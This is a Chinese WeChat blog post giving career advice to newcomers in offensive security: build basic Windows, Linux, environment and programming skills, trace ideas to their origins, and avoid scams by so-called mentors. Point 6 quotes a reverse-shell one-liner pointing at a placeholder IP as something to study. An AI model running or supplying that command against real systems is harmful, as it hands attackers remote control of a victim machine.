各位未来的大牛、黑客、赏金猎人、红队下午好哇,如标题所见,今天是一期杂谈。
做公众号也三年了,有很多师傅都和我在微信聊过天,不管是群,还是私聊,看到过很多比较抽象的问题,简单举几个例子:
有没有linux版本的burp破解版?
xxx.jar怎么启动?
为什么我下载的工具(cve-2024-xxxxx.py)杀软软件报毒?
怎么写批量检测脚本?
有没有师傅带带我啊?
很多师傅半路出家,上来先干sql注入,接着再干文件上传,top10学完连怎么解压7z都还不知道,拿到一个jar束手无策,失去了GUI工具箱根本不知道工具怎么启动,别人写的代码根本不会想着看一眼,能运行就高呼大佬,被一个基础功底就能写出来的几十行代码的程序忽悠得团团转,没错,这就是现在真实的”安全圈“。
不管别人怎么做,我还是希望看到这篇文章的你,能够明白一个道理,那就是万丈高楼平地起,辉煌还得靠地基,学安全,做安全,起码你应该拥有一些基础能力和知识,不要急于求成,这个方向不是一个可以速成的领域,如果你尝试速成,最后的结果就是在做的过程中处处受阻,举步维艰。
如果以上内容和你完全相符,那我有一点经验和建议,希望能对看到这篇文章的你有帮助。
1、windows日常操作基础知识,包括但不限于如何解压各类压缩包,搭建虚拟机,管理文件妥善存放等等,起码你应该是一个windows达人,敲键盘、找功能都还不熟悉的话后面会非常吃力。
2、在你能够熟练使用windows,以及能够自行应对可能出现的各种问题,学会善用搜索引擎而不是傻乎乎的发群里问之后,你还需要熟悉linux,提醒一下,做安全不可能不会linux,不要逃避它,不一定需要你整个红帽认证那种级别,但起码基础命令,linux系统结构、原理,在linux上怎么做到自己想要的操作,比如装环境,比如执行可执行文件,比如下载上传东西,查运行,查端口,启动重启停止服务,查询状态,如果你觉得太多太复杂,不想系统的学,那我有个很好的建议,就是在正常学习的过程中,如果遇见linux命令,请手敲,不要复制黏贴,久而久之就可以熟练的使用linux了。
3、熟悉各种环境搭建以及使用,比如java,py等等,很多师傅就是头疼环境问题,其实这些不同的语言是一项通,项项通,原理是一样的,在你完成上面两点之后,你应该可以找到环境的解决办法以及理解它的原理,如果你还不能通过自己查资料以及用工具解决多环境问题,我真诚的建议你转行,IT这块难再发展了。
4、除了上面提到的善用搜索引擎(我个人推荐使用bing、谷歌)以外,我们还需要一点更强的资料查找能力,微信公众号、github、推特、youtube也要利用起来,很多时候你需要的东西不是一定要付费,或者不需要付那么多费,不要被简单的东西割韭菜。
5、一定要会一点编程,不需要你会非常深的操作,不用你去考虑高性能、死锁等等问题,一门编程语言,基本上只需要学15天,当你能够像搭积木一样做出一个傻瓜式的程序,能够初步代替手工的时候,对学安全来讲就足够了,深入那是之后的事情,不是你现阶段的目标,当你完成这15天的学习,你再转过头去看你之前认为的所谓大佬写的东西,你会发现其实他们也只是在傻乎乎的搭积木,在如今AI的能力加持下,你从零基础到和他们一样写工具,已经完全不需要有人教或者报培训班。
有师傅就疑惑了,为什么我要会呢,别人都写好了我直接用不就行了?
错误的,不要过于追求现成,求原理然后转化为自己的知识储备,这是一个思维,注意不单单只是用工具,在安全技术这一块,凡事亲力亲为,知道原理才是进步,自己会是自己的,别人会拿给你用,那是别人的,你没有而别人有,之间的差距就会在工资上体现出来。
6、如第五条所讲,追根溯源,是一个非常值得拥有的能力,无论是你学习技术,还是找资料,一定要保持追根溯源的好习惯,举个例子,技术向,只知道打了一个payload可以造成rce是不够的,要知道为什么,payload进入目标程序后是如何执行的,甚至深入到进入到底层linux后它是怎么运行的,经典的反弹shell,一句简单的命令:sh -i >& /dev/tcp/xxx.xxx.xx.xx/9001 0>&1 当你去观察它是如何运作的时候,你就能感受到追求原理的魅力;找资料方面,当你看到一篇文章,一个工具,一个思路,如果当时不是原作所在,就要去找到它的出处,因为一般你觉得有价值的东西,他的作者还会产出另一些你可能认为有价值的东西,顺藤摸瓜。
7、这条不是安全相关,只是我的一个经验,当有人带给你足够利润的时候,你要思考他是否也有利润,同时判断价值是否相当,学会换位思考,如果你是他,你会不会这样做,坚信这个世界上不存在给你做慈善的人,就不会被骗。
8、你可以找同伴,找朋友,找志同道合的人,但切记不要找师父,没有人会平白无故带你,唯有互相交流,共同努力,互惠互利才是王道,我经常看到很多人都说自己有师傅,或者想找一个师傅带自己,正如第七条所说,换位思考,如果你是一个有能力的人,你愿不愿意无偿或者是低偿把自己赖以为生的东西教出去?有部分师傅知道没有人会无偿,但他却会相信有低偿,这就是为什么他会被割韭菜的原因,甚至有部分师傅还会相信有无偿,把某些”大黑客“奉为师傅,传授一些无足轻重的东西就感恩戴德,虽然没有金钱损失,但你浪费了自己的时间。
保守性交流,也许会错过贵人,但一定不会遭遇骗子。
☟上下滑动查看更多
